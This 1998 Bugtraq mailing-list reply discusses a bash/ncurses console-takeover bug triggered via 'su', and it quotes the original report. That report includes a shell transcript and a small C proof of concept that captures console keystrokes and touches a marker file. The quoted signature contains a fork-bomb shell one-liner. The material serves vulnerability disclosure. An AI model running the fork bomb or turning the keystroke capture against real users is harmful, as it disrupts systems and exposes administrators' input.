[6273] in bugtraq
Re: bash 2.01 / ncurses 4.1 console takeover "feature"
daemon@ATHENA.MIT.EDU (Savochkin Andrey Vladimirovich)
Tue Mar 10 19:03:40 1998
Date: Tue, 10 Mar 1998 11:08:25 +0300
Reply-To: Savochkin Andrey Vladimirovich <saw@MSU.RU>
From: Savochkin Andrey Vladimirovich <saw@MSU.RU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <01bd4a04$7f7f0f80$LocalHost@LCAMTUF>; from Michal Zalewski on
Sat, Mar 07, 1998 at 09:06:21PM +0100
The described problem isn't a serious one.
If user 'lcam' want to take a control over root's terminal
first of all he should force root to perform 'su lcam'.
So an attacker could take a control over root's terminal
only in the case of unexperienced superuser su'ing to unprivileged user=
s.
Nevertheless, 'su' from SimplePAMApps package developed by
Andrew Morgan <morgan@transmeta.com> is free of such a problem.
The program doesn't allow unprivileged user to kill it.
Regards,
Andrey V.
Savochkin
On Sat, Mar 07, 1998 at 09:06:21PM +0100, Michal Zalewski wrote:
> With bash 2.01 and ncurses 4.1, any program launched at unprivledged
> uid (eg. from 'su' shell) may takeover privledged user's console
> (to grab keystorkes or something else). I found it's quite easy when
> I tried to kill 'su' directly from unprivledged shell with signal 9:
>
> [root@genome /]# su lcam
> [lcam@genome /]$ killall -9 su
> Killed
> [root@genome /]#
>
> That was normal, but suddenly I saw again old prompt:
>
> [lcam@genome /]$
>
> >From this point, two bash instances (unprivledged one hasn't been
> killed with su!) were controlling my console at once... It looks
> just curious:
>
> [root@genome /]# id
> uid=3D0(root) gid=3D0(root) groups=3D0(root),1(bin),2(daemon),3(sys),=
4(adm),6(disk),10(wheel)
> [lcam@genome /]$ id
> uid=3D502(lcam) gid=3D502(lcam) groups=3D502(lcam)
> [lcam@genome /]$
> [root@genome /]#
>
> Of course, it isn't so scary, because it has been done manually...
> But is can be easily used in nasty program. Typical administrator
> believes that only unprivledged account may be compromised when
> he's launching something on it, and usually he's right, but
> ncurses has a vunerability which may be used to fool him. Unlike
> other lame su tricks, it's quite invisible (he may check on a
> second console - he's back in his REAL, root shell, but we can
> still control his console). I wrote simple program (it may be even
> aunched from ~/.bashrc; in the meantime, su should be killed), which
> is able to grab keystorke(s) from console:
>
> -- test.c --
> // gcc test.c -lncurses -oanything
> #include <curses.h>
> int main() {
> initscr();
> noecho();
> raw();
> while (1) if (getch()=3D=3D'x') system("touch /tmp/VOILA");
> }
> -- eof --
>
> It isn't perfect, actually it grabs only one of first 'x's, and fail
> to grab next ones (a lot of i/o errors when debugged ;-). But it
> CAN do that. For sure it's possible to keep control much longer, as
> shown above (bash example). Maybe it's even possible to do it even
> after logout, I not checked it.
>
> _____________________________________________________________________=
__
> Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw=
.pl]
> Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 =
[P. Deustch]
> =3D--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] --------------=
---=3D
